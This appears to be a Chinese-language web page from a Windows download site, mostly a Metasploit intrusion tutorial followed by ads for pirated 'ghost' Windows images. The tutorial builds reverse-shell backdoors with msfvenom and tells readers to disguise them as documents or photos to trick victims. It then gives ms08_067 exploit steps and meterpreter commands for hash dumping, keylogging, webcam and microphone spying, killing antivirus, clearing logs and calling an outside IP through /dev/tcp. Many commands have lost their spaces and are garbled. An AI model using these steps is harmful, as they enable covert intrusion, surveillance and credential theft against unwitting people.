exploit入侵电脑实践 MS17
入侵电脑(皆可)
需要的工具:(kali里面有)
-=本地=本地端口号–fexe–o文件名.exe
-==6666-fexe-oxss.exe
msfvenom-pandroid/meterpreter/reverse_tcpLHOST=172.16.60.144LPORT=8888Rtest.apk
即生成一个后门文件xss.exe
然后继续执行命令:
msfconsole
(运行msfconsole)
msfuseexploit/multi/handler(选择模块)
输入命令showpayloads会显示出有效的攻击载荷,比如shell_reverse_tcp。
msfexploit(handler)setpayloadwindows/meterpreter/reverse_tcp
setlhost加ip地址
setlport加端口号
msfexploit(handler)exploit-z-j(后台执行)
这样木马就配置好了,然后发给别人(可以伪造成文档,照片,软件等文件骗取别人打开)
发给别人后,等待别人打开xss.exe,打开即上钩了
msfexploit(handler)sessions(查看上钩的用户)
msfexploit(handler)sessions-i1(选择需要攻击的用户,这里选择第1个)
进入meterpreter了,即可进行一些相关的木马操作。
background:这个命令是将当前的session放到后台运行,可以在msf中继续其他渗透任务;
sessions:这个命令需要配合上面的background使用,该命令是将后台的会话打开,进行会话操作。
clearev:该命令是用来清除渗透的登录信息的,这个很有用。
hashdump:该命令是一个post模块,需要配合meterpreter使用,这个命令是用来获取目标系统的哈希值的
meterpreterrunpost/windows/gather/hashdump
migrate:这个也是一个post模块。可以将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀软。
meterpreterrunpost/windows/manage/migrate
webcam_list:列举摄像头。
webcam_snap:通过远程连接目标系统的摄像头。
runkillav:关闭对方的杀软,其实关闭杀软也可以进入cmd中手动关闭。
meterpreter
meterpreter是更高级的payload。
纯内存工作模式(不写硬盘),避免被电子取证;加密的通信协议,对传输过程进行加密;易于扩展。
基本命令
msfuseexploit/windows/smb/ms08_067_netapimsfexploit(ms08_067_netapi)setrhost192.168.80.148msfexploit(ms08_067_netapi)setpayloadwindows/meterpreter/reverse_tcpmsfexploit(ms08_067_netapi)setlhost192.168.80.163msfexploit(ms08_067_netapi)exploit-jmsfexploit(ms08_067_netapi)sessions-i1进入meterpreter类型的shellmeterpreterbackground退出到msf命令提示符下meterpreterlpwd等价于在kali上输入pwdmeterpreterlcd/etc等价于在kali上输入cd/etcmeterpreterrunpost/windows/gather/smart_hashdump获取目标主机上用户的hash值meterpreterrunpost/windows/capture/keylog_recorder键盘记录meterpreterrunkillav结束目标主机上的杀毒软件相关进程meterpreterclearev清除系统日志meterpreterdownloadboot.ini下载目标主机上的boot.ini文件meterpreterupload/usr/share/windows-binaries/nc.exec:\\windows\\system32上传nc.exe到目标主机上。(注意要使用2个反斜杠)meterpreterdirwindows\\system32\
c.exemeterpreterexecute-fnc-nvlp3333执行nc.exemeterpreterexecute-fbash-i/dev/tcp/104.199.1.1/8201meterpreterexecute-fbash-i-Hmeterpreterexecute-fcmd.exe-i-H获得目标主机的shell,-i交互模式,-H隐藏meterpreterexecute-H-m-dcalc.exe-fwce32.exe-a-ofoo.txtmeterpretercatfoo.txt-m直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查杀;-d设置需要显示的进程名,可以避开敏感人士的检查。meterpretergetuid查看当前用户meterpretergetsystem提权到system用户meterpretergetprivs查看当前用户具有的权限meterpretergetpid查看meterpreter注入到了什么进程中meterpretermigrate1436更改到pid1436进程中meterpretergetpid重新使用getpid命令查看meterpreterhashdump获取目标主机上用户的hash值meterpretersysinfo查看目标系统的信息meterpreterkill188结束188进程meterpretershell获取目标操作系统的shellmeterpreteridletime查看目标主机已经空闲了多长时间meterpretereditC:\\Windows\\System32\\drivers\\etc\\hosts编辑hosts文件meterpreterrecord_mic-d10-f/root/桌面/1.mp4监听麦克风meterpreterloadpython加载python插件
推荐系统
雨林木风 winxp下载 纯净版 永久激活 winxp ghost系统 sp3 系统下载
系统大小:0MB系统类型:WinXP雨林木风在系统方面技术积累雄厚深耕多年,打造了国内重装系统行业知名品牌,雨林木风WindowsXP其系统口碑得到许多人认可,积累了广大的用户群体,是一款稳定流畅的系统,雨林木风 winxp下载 纯净版 永久激活 winxp ghost系统 sp3 系统下载,有需要的朋友速度下载吧。
系统等级:进入下载 >萝卜家园win7纯净版 ghost系统下载 x64 联想电脑专用
系统大小:0MB系统类型:Win7萝卜家园win7纯净版是款非常纯净的win7系统,此版本优化更新了大量的驱动,帮助用户们进行舒适的使用,更加的适合家庭办公的使用,方便用户,有需要的用户们快来下载安装吧。
系统等级:进入下载 >雨林木风xp系统 xp系统纯净版 winXP ghost xp sp3 纯净版系统下载
系统大小:1.01GB系统类型:WinXP雨林木风xp系统 xp系统纯净版 winXP ghost xp sp3 纯净版系统下载,雨林木风WinXP系统技术积累雄厚深耕多年,采用了新的系统功能和硬件驱动,可以更好的发挥系统的性能,优化了系统、驱动对硬件的加速,加固了系统安全策略,运行环境安全可靠稳定。
系统等级:进入下载 >萝卜家园win10企业版 免激活密钥 激活工具 V2023 X64位系统下载
系统大小:0MB系统类型:Win10萝卜家园在系统方面技术积累雄厚深耕多年,打造了国内重装系统行业的萝卜家园品牌,(win10企业版,win10 ghost,win10镜像),萝卜家园win10企业版 免激活密钥 激活工具 ghost镜像 X64位系统下载,其系统口碑得到许多人认可,积累了广大的用户群体,萝卜家园win10纯净版是一款稳定流畅的系统,一直以来都以用户为中心,是由萝卜家园win10团队推出的萝卜家园
系统等级:进入下载 >萝卜家园windows10游戏版 win10游戏专业版 V2023 X64位系统下载
系统大小:0MB系统类型:Win10萝卜家园windows10游戏版 win10游戏专业版 ghost X64位 系统下载,萝卜家园在系统方面技术积累雄厚深耕多年,打造了国内重装系统行业的萝卜家园品牌,其系统口碑得到许多人认可,积累了广大的用户群体,萝卜家园win10纯净版是一款稳定流畅的系统,一直以来都以用户为中心,是由萝卜家园win10团队推出的萝卜家园win10国内镜像版,基于国内用户的习惯,做
系统等级:进入下载 >windows11下载 萝卜家园win11专业版 X64位 V2023官网下载
系统大小:0MB系统类型:Win11萝卜家园在系统方面技术积累雄厚深耕多年,windows11下载 萝卜家园win11专业版 X64位 官网正式版可以更好的发挥系统的性能,优化了系统、驱动对硬件的加速,使得软件在WINDOWS11系统中运行得更加流畅,加固了系统安全策略,WINDOWS11系统在家用办公上跑分表现都是非常优秀,完美的兼容各种硬件和软件,运行环境安全可靠稳定。
系统等级:进入下载 >
相关文章
- 有什么电脑自动关机软件好用 电脑自动关机软件下载推荐
- 微信抽奖小程序怎么弄,教你微信转盘抽奖小程序制作方法
- 收集意见建议小程序怎么弄,教你制作匿名收集意见的小程序
- 扫码助力活动怎么弄,微信公众号助力活动的制作步骤
- 海报裂变活动怎么弄,微信公众号生成海报裂变活动的方法
- 公众号推广二维码怎么弄,微信公众号推广二维码生成方法
- 公众号裂变活动制作,微信公众号怎么做裂变活动
- 登记信息二维码制作,如何实现扫码登记填报信息
- 登记表怎么弄,教你微信登记表格怎么做
- 参数二维码怎么弄,微信公众号带参数二维码怎么生成
- 报名二维码怎么弄,微信公众号报名二维码制作步骤
- 设置电脑定时关机命令如何更改 电脑定时关机命令设置方法详解
- win7怎么自动关机 win7自动关机时间设置方法
- 设置定时关机命令在哪 电脑设置定时关机命令
热门系统
推荐软件
推荐应用
推荐游戏
热门文章
常用系统
- 1win11最新娱乐版下载 技术员联盟x64位 ghost系统 ISO镜像 v2023
- 2电脑公司windows7纯净版 ghost x64位 v2022.05 官网镜像下载
- 3外星人系统Win11稳定版系统下载 windows11 64位稳定版Ghost V2022
- 4win11一键装机小白版下载 外星人系统 x64位纯净版下载 笔记本专用
- 5萝卜家园Ghost win10 64位中文版专业版系统下载 windows10纯净专业版下载
- 6【国庆特别版】番茄花园Windows11高性能专业版ghost系统 ISO镜像下载
- 7青苹果系统 GHOST WIN7 SP1 X64 专业优化版 V2024
- 8深度技术ghost win7纯净版最新下载 大神装机版 ISO镜像下载
- 9雨林木风windows11中文版免激活 ghost镜像 V2022.04下载